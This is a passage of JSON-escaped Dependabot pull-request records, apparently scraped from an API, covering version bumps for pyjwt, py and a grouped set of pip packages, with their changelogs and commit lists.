href=\"https://github.com/estin\"\u003e\u003ccode\u003e@​estin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/713\"\u003ejpadilla/pyjwt#713\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/720\"\u003ejpadilla/pyjwt#720\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eapi_jwk: Add PyJWKSet.\u003cstrong\u003egetitem\u003c/strong\u003e by \u003ca href=\"https://github.com/woodruffw\"\u003e\u003ccode\u003e@​woodruffw\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/725\"\u003ejpadilla/pyjwt#725\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate usage.rst by \u003ca href=\"https://github.com/guneybilen\"\u003e\u003ccode\u003e@​guneybilen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/727\"\u003ejpadilla/pyjwt#727\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/728\"\u003ejpadilla/pyjwt#728\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Update copyright information by \u003ca href=\"https://github.com/kkirsche\"\u003e\u003ccode\u003e@​kkirsche\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/729\"\u003ejpadilla/pyjwt#729\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocs: mention performance reasons for reusing RSAPrivateKey when encoding by \u003ca href=\"https://github.com/dmahr1\"\u003e\u003ccode\u003e@​dmahr1\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/734\"\u003ejpadilla/pyjwt#734\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFixed typo in usage.rst by \u003ca href=\"https://github.com/israelabraham\"\u003e\u003ccode\u003e@​israelabraham\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/738\"\u003ejpadilla/pyjwt#738\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd detached payload support for JWS encoding and decoding by \u003ca href=\"https://github.com/fviard\"\u003e\u003ccode\u003e@​fviard\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/723\"\u003ejpadilla/pyjwt#723\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/740\"\u003ejpadilla/pyjwt#740\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRaise DeprecationWarning for jwt.decode(verify=...) by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/742\"\u003ejpadilla/pyjwt#742\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't mutate options dictionary in .decode_complete() by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/743\"\u003ejpadilla/pyjwt#743\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/748\"\u003ejpadilla/pyjwt#748\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace various string interpolations with f-strings by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/744\"\u003ejpadilla/pyjwt#744\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate CHANGELOG.rst by \u003ca href=\"https://github.com/hipertracker\"\u003e\u003ccode\u003e@​hipertracker\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/751\"\u003ejpadilla/pyjwt#751\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/699\"\u003ejpadilla/pyjwt#699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rekyungmin\"\u003e\u003ccode\u003e@​rekyungmin\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/705\"\u003ejpadilla/pyjwt#705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sseering\"\u003e\u003ccode\u003e@​sseering\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/661\"\u003ejpadilla/pyjwt#661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/estin\"\u003e\u003ccode\u003e@​estin\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/713\"\u003ejpadilla/pyjwt#713\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/woodruffw\"\u003e\u003ccode\u003e@​woodruffw\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/725\"\u003ejpadilla/pyjwt#725\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/guneybilen\"\u003e\u003ccode\u003e@​guneybilen\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/727\"\u003ejpadilla/pyjwt#727\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dmahr1\"\u003e\u003ccode\u003e@​dmahr1\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/734\"\u003ejpadilla/pyjwt#734\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/israelabraham\"\u003e\u003ccode\u003e@​israelabraham\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/738\"\u003ejpadilla/pyjwt#738\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fviard\"\u003e\u003ccode\u003e@​fviard\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/723\"\u003ejpadilla/pyjwt#723\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/742\"\u003ejpadilla/pyjwt#742\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hipertracker\"\u003e\u003ccode\u003e@​hipertracker\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/751\"\u003ejpadilla/pyjwt#751\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.3.0...2.4.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.3.0...2.4.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e2.3.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/700\"\u003ejpadilla/pyjwt#700\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd exception chaining by \u003ca href=\"https://github.com/ehdgua01\"\u003e\u003ccode\u003e@​ehdgua01\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/702\"\u003ejpadilla/pyjwt#702\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;Remove arbitrary kwargs.\u0026quot; by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/701\"\u003ejpadilla/pyjwt#701\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.4.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.3.0...2.4.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- [CVE-2022-29217] Prevent key confusion through non-blocklisted public key formats. https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24\n\u003cp\u003eChanged\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Explicit check the key for ECAlgorithm by @estin in https://github.com/jpadilla/pyjwt/pull/713\n- Raise DeprecationWarning for jwt.decode(verify=...) by @akx in https://github.com/jpadilla/pyjwt/pull/742\n\nFixed\n~~~~~\n\n- Don't use implicit optionals by @rekyungmin in https://github.com/jpadilla/pyjwt/pull/705\n- documentation fix: show correct scope for decode_complete() by @sseering in https://github.com/jpadilla/pyjwt/pull/661\n- fix: Update copyright information by @kkirsche in https://github.com/jpadilla/pyjwt/pull/729\n- Don't mutate options dictionary in .decode_complete() by @akx in https://github.com/jpadilla/pyjwt/pull/743\n\nAdded\n~~~~~\n\n- Add support for Python 3.10 by @hugovk in https://github.com/jpadilla/pyjwt/pull/699\n- api_jwk: Add PyJWKSet.__getitem__ by @woodruffw in https://github.com/jpadilla/pyjwt/pull/725\n- Update usage.rst by @guneybilen in https://github.com/jpadilla/pyjwt/pull/727\n- Docs: mention performance reasons for reusing RSAPrivateKey when encoding by @dmahr1 in https://github.com/jpadilla/pyjwt/pull/734\n- Fixed typo in usage.rst by @israelabraham in https://github.com/jpadilla/pyjwt/pull/738\n- Add detached payload support for JWS encoding and decoding by @fviard in https://github.com/jpadilla/pyjwt/pull/723\n- Replace various string interpolations with f-strings by @akx in https://github.com/jpadilla/pyjwt/pull/744\n- Update CHANGELOG.rst by @hipertracker in https://github.com/jpadilla/pyjwt/pull/751\n\n`v2.3.0 \u0026amp;lt;https://github.com/jpadilla/pyjwt/compare/2.2.0...2.3.0\u0026amp;gt;`__\n-----------------------------------------------------------------------\n\nFixed\n~~~~~\n\n- Revert \u0026amp;quot;Remove arbitrary kwargs.\u0026amp;quot; `[#701](https://github.com/jpadilla/pyjwt/issues/701) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/701\u0026amp;gt;`__\n\nAdded\n~~~~~\n\n- Add exception chaining `[#702](https://github.com/jpadilla/pyjwt/issues/702) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/702\u0026amp;gt;`__\n\n`v2.2.0 \u0026amp;lt;https://github.com/jpadilla/pyjwt/compare/2.1.0...2.2.0\u0026amp;gt;`__\n-----------------------------------------------------------------------\n\n\u0026amp;lt;/tr\u0026amp;gt;\u0026amp;lt;/table\u0026amp;gt; \n\u0026lt;/code\u0026gt;\u0026lt;/pre\u0026gt;\n\u0026lt;/blockquote\u0026gt;\n\u0026lt;p\u0026gt;... (truncated)\u0026lt;/p\u0026gt;\n\u0026lt;/details\u0026gt;\n\u0026lt;details\u0026gt;\n\u0026lt;summary\u0026gt;Commits\u0026lt;/summary\u0026gt;\n\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/jpadilla/pyjwt/commit/83ff831a4d11190e3a0bed781da43f8d84352653\u0026quot;\u0026gt;\u0026lt;code\u0026gt;83ff831\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; chore: update changelog\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/jpadilla/pyjwt/commit/4c1ce8fd9019dd312ff257b5141cdb6d897379d9\u0026quot;\u0026gt;\u0026lt;code\u0026gt;4c1ce8f\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; chore: update changelog\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/jpadilla/pyjwt/commit/96f3f0275745c5a455c019a0d3476a054980e8ea\u0026quot;\u0026gt;\u0026lt;code\u0026gt;96f3f02\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; fix: failing advisory test\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc\u0026quot;\u0026gt;\u0026lt;code\u0026gt;9c52867\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request from GHSA-ffqj-6fqr-9h24\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/jpadilla/pyjwt/commit/24b29adfebcb4f057a3cef5aaf35653bc0c1c8cc\u0026quot;\u0026gt;\u0026lt;code\u0026gt;24b29ad\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Update CHANGELOG.rst (\u0026lt;a href=\u0026quot;https://redirect.github.com/jpadilla/pyjwt/issues/751\u0026quot;\u0026gt;#751\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/jpadilla/pyjwt/commit/31f5acb8fb3ec6cdfe2b1b0a4a8f329b5f3ca67f\u0026quot;\u0026gt;\u0026lt;code\u0026gt;31f5acb\u0026lt;/...\n\n_Description has been truncated_","html_url":"https://github.com/alfonsodg/pygmy/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/alfonsodg%2Fpygmy/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"}},{"old_version":"1.8.0","new_version":"1.11.0","update_type":"minor","path":"/eval/latex2sympy","pr_created_at":"2025-09-06T11:38:06.000Z","version_change":"1.8.0 → 1.11.0","issue":{"uuid":"2804728907","node_id":"PR_kwDOPjLKZ86nLMRL","number":1,"state":"open","title":"Bump py from 1.8.0 to 1.11.0 in /eval/latex2sympy","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-09-06T11:38:06.000Z","updated_at":"2025-09-06T11:38:06.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"py","old_version":"1.8.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"}],"path":"/eval/latex2sympy","ecosystem":"pip"},"body":"Bumps [py](https://github.com/pytest-dev/py) from 1.8.0 to 1.11.0.\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.8.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=py\u0026package-manager=pip\u0026previous-version=1.8.0\u0026new-version=1.11.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Sayanc93/latent-reasoner/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/Sayanc93/latent-reasoner/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Sayanc93%2Flatent-reasoner/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"}},{"old_version":"1.8.1","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-08-31T04:08:20.000Z","version_change":"1.8.1 → 1.11.0","issue":{"uuid":"2787335412","node_id":"PR_kwDOE1q2p86mI1z0","number":1,"state":"open","title":"Bump the pip group across 1 directory with 16 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-08-31T04:08:20.000Z","updated_at":"2025-08-31T04:08:21.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":16,"packages":[{"name":"black","old_version":"19.10b0","new_version":"24.3.0","repository_url":"https://github.com/psf/black"},{"name":"bleach","old_version":"3.1.5","new_version":"3.3.0","repository_url":"https://github.com/mozilla/bleach"},{"name":"certifi","old_version":"2020.4.5.1","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"idna","old_version":"2.9","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"ipython","old_version":"7.15.0","new_version":"8.10.0","repository_url":"https://github.com/ipython/ipython"},{"name":"jinja2","old_version":"2.11.2","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"jupyter-core","old_version":"4.6.3","new_version":"4.11.2","repository_url":"https://github.com/jupyter/jupyter_core"},{"name":"nbconvert","old_version":"5.6.1","new_version":"6.5.1","repository_url":"https://github.com/jupyter/nbconvert"},{"name":"notebook","old_version":"6.0.3","new_version":"6.4.12","repository_url":"https://github.com/jupyter/notebook"},{"name":"numpy","old_version":"1.18.5","new_version":"1.22.0","repository_url":"https://github.com/numpy/numpy"},{"name":"py","old_version":"1.8.1","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.23.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"tornado","old_version":"6.0.4","new_version":"6.5","repository_url":"https://github.com/tornadoweb/tornado"},{"name":"tqdm","old_version":"4.46.1","new_version":"4.66.3","repository_url":"https://github.com/tqdm/tqdm"},{"name":"urllib3","old_version":"1.25.9","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"zipp","old_version":"3.1.0","new_version":"3.19.1","repository_url":"https://github.com/jaraco/zipp"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 16 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [black](https://github.com/psf/black) | `19.10b0` | `24.3.0` |\n| [bleach](https://github.com/mozilla/bleach) | `3.1.5` | `3.3.0` |\n| [certifi](https://github.com/certifi/python-certifi) | `2020.4.5.1` | `2024.7.4` |\n| [idna](https://github.com/kjd/idna) | `2.9` | `3.7` |\n| [ipython](https://github.com/ipython/ipython) | `7.15.0` | `8.10.0` |\n| [jinja2](https://github.com/pallets/jinja) | `2.11.2` | `3.1.6` |\n| [jupyter-core](https://github.com/jupyter/jupyter_core) | `4.6.3` | `4.11.2` |\n| [nbconvert](https://github.com/jupyter/nbconvert) | `5.6.1` | `6.5.1` |\n| [notebook](https://github.com/jupyter/notebook) | `6.0.3` | `6.4.12` |\n| [numpy](https://github.com/numpy/numpy) | `1.18.5` | `1.22.0` |\n| [py](https://github.com/pytest-dev/py) | `1.8.1` | `1.11.0` |\n| [requests](https://github.com/psf/requests) | `2.23.0` | `2.32.4` |\n| [tornado](https://github.com/tornadoweb/tornado) | `6.0.4` | `6.5` |\n| [tqdm](https://github.com/tqdm/tqdm) | `4.46.1` | `4.66.3` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.25.9` | `2.5.0` |\n| [zipp](https://github.com/jaraco/zipp) | `3.1.0` | `3.19.1` |\n\n\nUpdates `black` from 19.10b0 to 24.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/black/releases\"\u003eblack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e24.3.0\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cp\u003eThis release is a milestone: it fixes Black's first CVE security vulnerability. If you\nrun Black on untrusted input, or if you habitually put thousands of leading tab\ncharacters in your docstrings, you are strongly encouraged to upgrade immediately to fix\n\u003ca 